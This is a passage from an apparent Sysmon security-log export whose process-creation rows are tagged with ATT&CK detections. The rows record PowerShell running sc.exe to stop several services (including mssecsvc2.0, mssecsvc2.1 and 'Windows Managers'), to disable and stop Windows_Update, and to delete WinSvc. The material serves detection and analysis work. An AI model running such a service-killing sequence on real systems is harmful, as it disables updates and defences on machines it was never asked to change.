+FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.618209400Z"",""eventRecordID"":""2381"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.616\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010fa0a1e00}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.616"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010fa0a1e00}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.775",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.484 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001066081e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.488163800Z"",""eventRecordID"":""2378"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.484\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001066081e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.484"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001066081e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.733",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.371 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00109b051e00} +ProcessId: 1600 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.374781500Z"",""eventRecordID"":""2375"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.371\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00109b051e00}\r\nProcessId: 1600\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.371"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00109b051e00}"",""processId"":""1600"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.463",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.345 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010b1041e00} +ProcessId: 5740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.356332800Z"",""eventRecordID"":""2374"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.345\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010b1041e00}\r\nProcessId: 5740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.345"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010b1041e00}"",""processId"":""5740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.298 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00101f021e00} +ProcessId: 6880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.304916500Z"",""eventRecordID"":""2372"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.298\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00101f021e00}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.298"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00101f021e00}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.387",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.241 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001073fc1d00} +ProcessId: 4408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.247954500Z"",""eventRecordID"":""2369"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.241\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001073fc1d00}\r\nProcessId: 4408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.241"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001073fc1d00}"",""processId"":""4408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.353",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.204 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00108cfa1d00} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 